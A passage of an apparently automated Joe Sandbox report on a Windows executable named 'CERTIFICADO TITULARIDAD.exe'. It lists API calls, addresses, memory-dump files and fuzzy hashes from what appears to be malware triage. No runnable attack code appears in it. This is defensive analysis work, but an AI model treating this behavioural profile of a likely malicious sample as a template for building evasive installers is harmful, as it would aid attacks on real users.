                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                          • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                                                                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                          • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(73F7505C,00000004,00000040,73F7504C), ref: 73F72A9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 48e9675464a87825a0f411562fcce095a25dfdc4ddf7be9c339ec50ec785e929
                                                                                                                          • Instruction ID: 61c77c2054904f9837ed0604103292a7452e6f6e42f0f3ea9f644178f1c599c5
                                                                                                                          • Opcode Fuzzy Hash: 48e9675464a87825a0f411562fcce095a25dfdc4ddf7be9c339ec50ec785e929
                                                                                                                          • Instruction Fuzzy Hash: 2DF0A5F2900283DED350EF2A8464B093BE1B7093C4BF4452EE19ED6261E3344044CFA1
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1096422788-0
                                                                                                                          • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                          • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                                                          • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                          • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                          • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                                                                                                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                          • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                                                                                                                          APIs
                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 8486de703da0bfe8c2f42fc47992959c8484d89783e4153a0d377e43c911c9bc
                                                                                                                          • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                                                                                                                          • Opcode Fuzzy Hash: 8486de703da0bfe8c2f42fc47992959c8484d89783e4153a0d377e43c911c9bc
                                                                                                                          • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                          • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                                                                                          • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                          • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                          • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                                                          • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                          • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                          • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                                                          • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                          • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: 57e845af47943e6f27bbb4059720a752bc9b9a50a98f721ee69ade980d1e6af7
                                                                                                                          • Instruction ID: a775f6773ee6fca20605c15f6de2f930d7ecc582f877687dc3caa15317c5c1fc
                                                                                                                          • Opcode Fuzzy Hash: 57e845af47943e6f27bbb4059720a752bc9b9a50a98f721ee69ade980d1e6af7
                                                                                                                          • Instruction Fuzzy Hash: 8ED05E73A142008BD710EBB8BE854AF73B8EA403193204C3BD102E1191E6788902461C
                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,73F712DB,?,73F7137F,00000019,73F711CA,-000000A0), ref: 73F712C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
                                                                                                                          • Opcode ID: c255928d089358606d483bb17b2f90d9771ab67d2af687ea588e5fcafd2082e9
                                                                                                                          • Instruction ID: f6ebdfdd013e0c86cab908a23a13f2a975ee94a4600192487cb1fba60916cd96
                                                                                                                          • Opcode Fuzzy Hash: c255928d089358606d483bb17b2f90d9771ab67d2af687ea588e5fcafd2082e9
                                                                                                                          • Instruction Fuzzy Hash: 9CB012B2600000DFEE00BB15DC1AF343254F700340FA40000B60EC1060C12048008524
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                                                          • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                                                            • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                                                            • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                            • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                            • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                            • Part of subcall function 004067CF: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                                                            • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                            • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                                                            • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$C:\Users\user\subprovince$Call
                                                                                                                          • API String ID: 2624150263-2352960300
                                                                                                                          • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                                                          • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                                                                                          • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                                                          • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 73F712BB: GlobalAlloc.KERNELBASE(00000040,?,73F712DB,?,73F7137F,00000019,73F711CA,-000000A0), ref: 73F712C5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73F71D2D
                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 73F71D75
